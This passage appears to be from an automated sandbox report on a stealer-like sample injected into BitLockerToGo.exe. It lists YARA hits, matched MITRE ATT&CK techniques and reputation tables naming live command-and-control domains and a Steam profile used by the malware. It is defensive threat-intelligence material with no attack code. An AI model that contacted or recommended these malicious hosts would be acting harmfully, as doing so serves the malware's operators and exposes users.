            Source: Yara match | File source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: Yara match | File source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000002.00000002.1646610952.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.1596179225.0000000001558000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix (one line per tactic; a technique prefixed with a number is one this sample's signatures matched, with the count badge as shown in the report)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
            Execution: 1 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
            Privilege Escalation: 311 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script
            Defense Evasion: 2 Virtualization/Sandbox Evasion; 311 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 DLL Side-Loading
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
            Discovery: 11 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 22 System Information Discovery; System Network Configuration Discovery; Internet Connection Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
            Collection: 1 Screen Capture; 1 Archive Collected Data; 2 Clipboard Data; Input Capture; Keylogging
            Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact

            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            locatedblsoqp.shop | 100% | URL Reputation | phishing |
            caffegclasiqwp.shop | 100% | URL Reputation | malware |
            condedqpwqm.shop | 100% | URL Reputation | phishing |
            millyscroqwp.shop | 100% | URL Reputation | malware |
            stamppreewntnq.shop | 100% | URL Reputation | phishing |
            evoliutwoqm.shop | 0% | URL Reputation | safe |
            stagedchheiqwo.shop | 100% | URL Reputation | phishing |
            traineiwnqo.shop | 100% | URL Reputation | malware |
            Source | Detection | Scanner | Label | Link
            https://player.vimeo.com | 0% | URL Reputation | safe |
            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f | 0% | URL Reputation | safe |
            https://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
            https://www.gstatic.cn/recaptcha/ | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | URL Reputation | safe |
            http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe |
            https://locatedblsoqp.shop/api | 100% | URL Reputation | malware |
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | URL Reputation | safe |
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | URL Reputation | safe |
            https://steam.tv/ | 0% | URL Reputation | safe |
            https://steamcommunity.com/profiles/76561199724331900 | 100% | URL Reputation | malware |
            https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | URL Reputation | safe |
            http://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
            https://store.steampowered.com/points/shop/ | 0% | URL Reputation | safe |
            https://lv.queniujq.cn | 0% | URL Reputation | safe |
            https://steamcommunity.com/profiles/76561199724331900/inventory/ | 100% | URL Reputation | malware |
            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | URL Reputation | safe |
            https://store.steampowered.com/privacy_agreement/ | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | URL Reputation | safe |
            https://checkout.steampowered.com/ | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | URL Reputation | safe |
            https://store.steampowered.com/; | 0% | URL Reputation | safe |
            https://store.steampowered.com/about/ | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english | 0% | URL Reputation | safe |
            https://help.steampowered.com/en/ | 0% | URL Reputation | safe |
            https://store.steampowered.com/news/ | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/ | 0% | URL Reputation | safe |
            http://store.steampowered.com/subscriber_agreement/ | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1 | 0% | URL Reputation | safe |
            https://recaptcha.net/recaptcha/; | 0% | URL Reputation | safe |
            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0% | URL Reputation | safe |
            https://store.steampowered.com/stats/ | 0% | URL Reputation | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            steamcommunity.com | 104.102.49.254 | true | true |  | unknown
            nippydxmnwquo.shop | 188.114.96.3 | true | true |  | unknown
            sergei-esenin.com | 104.21.53.8 | true | true |  | unknown
            locatedblsoqp.shop | unknown | unknown | true | 100%, URL Reputation | unknown
            caffegclasiqwp.shop | unknown | unknown | true | 100%, URL Reputation | unknown
            condedqpwqm.shop | unknown | unknown | true | 100%, URL Reputation | unknown
            millyscroqwp.shop | unknown | unknown | true | 100%, URL Reputation | unknown
            stamppreewntnq.shop | unknown | unknown | true | 100%, URL Reputation | unknown
            evoliutwoqm.shop | unknown | unknown | true | 0%, URL Reputation | unknown
            stagedchheiqwo.shop | unknown | unknown | true | 100%, URL Reputation | unknown
            traineiwnqo.shop | unknown | unknown | true | 100%, URL Reputation | unknown
            Name | Malicious | Antivirus Detection | Reputation
            nippydxmnwquo.shop | true |  | unknown
            https://steamcommunity.com/profiles/76561199724331900 | true | URL Reputation: malware | unknown
            https://nippydxmnwquo.shop/api | true |  | unknown
            locatedblsoqp.shop | true |  | unknown
            caffegclasiqwp.shop | true |  | unknown
            millyscroqwp.shop | true |  | unknown
            traineiwnqo.shop | true |  | unknown
            condedqpwqm.shop | true |  | unknown
            stagedchheiqwo.shop | true |  | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://www.cloudflare.com/learning/access-management/phishing-attack/ | BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000623000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://player.vimeo.com | BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://caffegclasiqwp.shop/ | BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp | BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f | BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://steamcommunity.com/?subsection=broadcasts | BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://caffegclasiqwp.shop/wq | BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://microsoftgraph.chinacloudapi.cn/crypto/rsa: | SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | false |  | unknown
            https://sergei-esenin.com/ | BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.1646797955.000000000059C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://manage.windowsazure.com/publishsettings/indexcrypto/elliptic: | SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | false |  | unknown
            https://store.steampowered.com/subscriber_agreement/ | BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.gstatic.cn/recaptcha/ | BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://login.s | BitLockerToGo.exe, 00000002.00000003.1636364105.000000000061D000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.valvesoftware.com/legal.htm | BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.youtube.com | BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.google.com | BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmp | false |  | unknown
            https://locatedblsoqp.shop/api | BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://management.usgovcloudapi.net/https://servicebus.usgovcloudapi.net/https://batch.core.usgovcl | SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exe | false |  | unknown
            https://locatedblsoqp.shop/=z | BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp | true |  | unknown
                                                            unknown
                                                            https://management.core.usgovcloudapi.net/https://dev.azuresynapse.usgovcloudapi.netinsufficientSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://caffegclasiqwp.shop/piBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPiBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://s.ytimg.com;BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://steam.tv/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://steamcommunity.com/profiles/76561199724331900uBitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://microsoftgraph.chinacloudapi.cngoSecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                        unknown
                                                                        https://steamcommunity.com/mBitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://sergei-esenin.com/apiDQBitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://stagedchheiqwo.shop/apiBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://gallery.azure.com/https://graph.windows.net/mariadb.database.azure.comhttps://storage.azure.SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exefalse
                                                                                unknown
                                                                                https://sergei-esenin.com/zBitLockerToGo.exe, 00000002.00000003.1646510389.000000000062E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://sketchfab.comBitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://caffegclasiqwp.shop/BBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://lv.queniujq.cnBitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: malware
                                                                                      unknown
                                                                                      https://www.youtube.com/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://www.cloudflare.com/5xx-error-landingBitLockerToGo.exe, 00000002.00000003.1636364105.0000000000607000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&aBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.0000000000596000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://locatedblsoqp.shop/BitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1609030164.00000000005E0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                              unknown
                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://www.google.com/recaptcha/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://checkout.steampowered.com/BitLockerToGo.exe, 00000002.00000003.1624485000.0000000000623000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://sergei-esenin.com/apirBitLockerToGo.exe, 00000002.00000002.1646797955.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://sergei-esenin.com/ZBitLockerToGo.exe, 00000002.00000002.1646797955.000000000058B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://millyscroqwp.shop/apinBitLockerToGo.exe, 00000002.00000003.1635942795.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624530876.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1636364105.00000000005D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000002.00000003.1635668848.0000000000637000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1624485000.000000000062A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.1634303159.0000000000637000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
